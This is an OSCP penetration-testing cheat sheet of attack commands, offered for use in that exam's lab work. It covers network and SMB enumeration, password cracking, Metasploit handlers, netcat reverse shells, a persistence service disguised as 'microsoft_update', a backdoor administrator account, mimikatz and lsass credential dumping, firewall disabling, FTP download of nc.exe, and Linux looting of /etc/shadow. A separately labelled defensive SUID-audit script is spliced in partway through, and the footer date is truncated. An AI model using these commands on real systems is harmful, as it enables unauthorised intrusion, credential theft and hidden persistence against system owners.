OSCP Cheat Sheet
Here are some commands that I found helpful during the OSCP. I encourage you to take a look at
the resource links that I've posted here to go into further detail on many of these topics.
Pre
Scanning
Quick Pass
nmap --top-ports 10 --open <IP>
Intense scan
nmap -p 1-65535 -T4 -A -v <IP>
Web
nikto -h <IP>
dirb http://<IP> /usr/share/wordlists/dirb/
fimap -u <URL>
./dotdotpwn.pl -m <module> -h <host> [OPTIONS]
wpscan --url http://<IP>/ --enumerate p
File Include Resource 1 (https://evitzone.org/tutorials/remote-file-inclusion%28rfi%29/)
File Include Resource 2 (http://www.hackersonlineclub.com/lfi-rfi)
File Include Resource 3 (https://0xzoidberg.wordpress.com/category/security/lfi-rfi/)
SMB/RPC
enum4linux -a <IP>
nmap --script=smb* -p <PORT> <IP>
rpcclient -U "" -N <IP>
showmount -e <IP>
mount -t cifs //<IP>/<share> <mountpoint> -o username="guest",password=""
net view \\<IP>
nbtscan -r <IP range>
smbclient -L \\<IP> -U <login>
nmblookup -A <target>
SQL
SQL Injection Cheat Sheet (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
nmap -sV -Pn <IP>
sqlmap -u <URL>
SMTP
nmap --script=smtp* -p <PORT> <IP>
SNMP
snmpwalk -v1 -c public <IP>
snmpenum -t <IP>
onesixtyone -c <community list> -i <IP list>
FTP
nmap --script=ftp* -p <PORT> <IP>
ftp://<IP>
DNS
Backdoor SQL Injection (http://resources.infosecinstitute.com/backdoor-sql-injection/)
./dnsrecon.py -d <domain>
./dnsrecon.py -d <domain> -t axfr
./dnsrecon.py -d <domain> -D <dictionary> -t brt
./dnsrecon.py -d <domain> -t zonewalk
nmap --script=dns-zone-transfer -p 53 ns2.megacorpone.com
nmap -p- -sV --reason --dns-servers 1.2.3.4 <IP>
Pass-the-Hash
pth-winexe -U <user>%<hash> //<IP> cmd
During
Password Cracking
Discover the type of hash that you have
hash-identifier
John the Ripper
/etc/shadow cracking
  Create a file with passwd
  Create a file with shadow
  Combine into one document
    unshadow <passwd file> <shadow file> > <combined file>
  john --wordlist=<any word list> <combined file>
Medusa
medusa -h <IP> -U <USER FILE> -P <PASS FILE> -M ssh -v 4
medusa -h <IP> -U <USER FILE> -P <PASS FILE> -M http -m DIR:/admin
Hashcat
hashcat -m 400 -a 0 <HASH FILE> <WORD LIST>
TTY Shells
See TTY Shells (http://thor-sec.com/cheatsheet/tty_spawnage/) section
Metasploit Payloads
See msfvenom cheat sheet (http://thor-sec.com/cheatsheet/msfvenom_cheat_sheet/) section
Metasploit commands
getuid
search -f *pass*.txt
shell
getprivs
sessions -i 1 (puts you back into your session)
Turn a regular shell into a meterpreter shell
  Attacker
    use exploit/multi/handler
    set payload windows/shell/reverse_tcp
    set lport <port>
  Target
  Attacker
    Ctrl+Z (to background the session)
    sessions -l (this will list your sessions to verify which one it is)
    set lhost <IP>
    set lport <port>
    sessions -u 1 (the 1 is the session number)
Netcat
See Netcat cheat sheet (http://thor-sec.com/cheatsheet/netcat_cheatsheet/) section
Useful Windows Commands
net view
net user
net localgroup Users
net localgroup Administrators
net user hacker password /add
net localgroup administrators hacker /add
dir /s *.doc
system("start cmd.exe /k $cmd")
sc create microsoft_update binpath= "cmd /K start c:\nc.exe -d <IP> <PORT> -e cmd.exe" start= auto error= ignore
c:\nc.exe -e c:\windows\system32\cmd.exe -vv <IP> <PORT>
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
procdump.exe -accepteula -ma lsass.exe lsass.dmp (32-bit)
\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp (64-bit)
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
netsh firewall set opmode disable
%SYSTEMDRIVE%\boot.ini
%WINDIR%\win.ini
type %WINDIR%\System32\drivers\etc\hosts
Useful Nix Commands
SUID root files: find / -user root -perm -4000 -print
SGID root files: find / -group root -perm -2000 -print
SUID & SGID files (any owner): find / \( -perm -4000 -o -perm -2000 \) -print
Files not owned by anyone: find / -nouser -print
Files not owned by any group: find / -nogroup -print
Symlinks and their pointers: find / -type l -ls
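As an added, defender-side example (not part of the original cheat sheet): the one-off find commands above wrapped into a repeatable audit of a host's privilege-escalation surface. A baseline is recorded once on a known-good build and later runs are diffed against it, so a newly planted SUID binary, an unexpected SGID helper or an ownerless file stands out instead of being lost in the noise of the normal list. It assumes only POSIX sh with find(1), sort(1), comm(1) and awk(1); the function names and the baseline path in the usage comment are my own.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): turn the find commands
# above into a baseline-and-diff audit of SUID/SGID/ownerless files.
# Assumed tooling: POSIX sh with find(1), sort(1), comm(1) and awk(1).

# Fixed collation so that sort and comm agree on line order across runs.
LC_ALL=C
export LC_ALL

# list_privileged_files DIR
# Prints SUID, SGID and ownerless files under DIR, one per line as
# "<FLAG> <path>", sorted so two runs can be compared with comm(1).
# -xdev keeps the walk on one filesystem (no /proc, no network mounts).
list_privileged_files() {
    root="${1:-/}"
    {
        find "$root" -xdev -type f -perm -4000 -print 2>/dev/null | sed 's/^/SUID /'
        find "$root" -xdev -type f -perm -2000 -print 2>/dev/null | sed 's/^/SGID /'
        find "$root" -xdev \( -nouser -o -nogroup \) -print 2>/dev/null | sed 's/^/ORPHAN /'
    } | sort
}

# check_against_baseline DIR BASELINE_FILE
# BASELINE_FILE is earlier output of list_privileged_files for the same DIR.
# Prints "+ <entry>" for files that appeared since the baseline and
# "- <entry>" for files that disappeared; returns 0 when nothing changed,
# 1 when there is drift (so it can gate a cron job or a CI check).
check_against_baseline() {
    root="$1"
    baseline="$2"
    current=$(mktemp)
    list_privileged_files "$root" > "$current"
    # comm -3 leaves only lines unique to one side: baseline-only lines
    # have no leading tab, current-only lines are prefixed with one tab.
    drift=$(comm -3 "$baseline" "$current" |
        awk -F'\t' 'NF == 2 { print "+ " $2 } NF == 1 { print "- " $1 }')
    rm -f "$current"
    if [ -n "$drift" ]; then
        printf '%s\n' "$drift"
        return 1
    fi
    return 0
}

# Usage (run as root for a full-system view; baseline path is an assumption):
#   list_privileged_files / > /var/lib/suid-baseline.txt    # once, on a clean host
#   check_against_baseline / /var/lib/suid-baseline.txt     # later, or from cron
```

The non-zero return on drift is the point of the second function: wired into cron or a configuration check, it turns the cheat sheet's enumeration commands into an alert when the privileged-file inventory changes.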
Download an EXE from FTP server
echo open <IP> > C:\script.txt
echo user myftpuser>> C:\script.txt
echo pass myftppass>> C:\script.txt
echo get nc.exe>> C:\script.txt
echo bye>> C:\script.txt
ftp -s:C:\script.txt
Shells
See resources (http://thor-sec.com/review/oscp_review/#resource) section
Reverse Shell Cheat Sheet (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
Post
Windows looting (brief)
systeminfo
type boot.ini
hostname
ipconfig /all
netstat -ano
net users
net localgroup
route print
arp -a
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
net start
accesschk.exe -ucqv "Authenticated Users" *
dir /s network-secret.txt
windump -i 2 -w capture -n -U -s 0 src not <IP> and dst not <IP>
Nix looting (brief)
locate proof.txt network-secret.txt
find / -name "proof.txt" -o -name "network-secret.txt"
uname -a
cat /proc/version
cat /etc/passwd
cat /etc/shadow
cat /etc/group
ls -alh | grep "<pattern>"
ifconfig -a
netstat -ano
cat /etc/hosts
arp
tcpdump -i eth0 -w capture -s 0 src not <IP> and dst not <IP>
tcpdump -i eth0 src not <IP> and dst not <IP>
Packet Sniffing
tcpdump -i tap0 host <IP> and tcp port 80 and not arp and not icmp -vvv
tcpdump -i eth0 -w capture -n -U -s 0 src not <IP> and dst not <IP>
tcpdump -i eth0 src not <IP> and dst not <IP>
Other
Quick Kali Configuration
SSH
  Start
    service ssh start
  Stop
    service ssh stop
HTTP Service
  Start
    service apache2 start
  Verify it's running
    http://127.0.0.1
  Directory
    /var/www/
  Stop
    service apache2 stop
Update boot sequence
update-rc.d ssh enable
update-rc.d apache2 enable
rcconf (GUI)
Compiling Exploits
32-bit
gcc -m32 -o output32 hello.c
64-bit
gcc -o output hello.c
Windows Compiling
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o exploit.exe /tmp/exploit.c -lwsock32
wine exploit.exe
Tags: OSCP
Categories: Cheatsheet
Updated: July 18, 207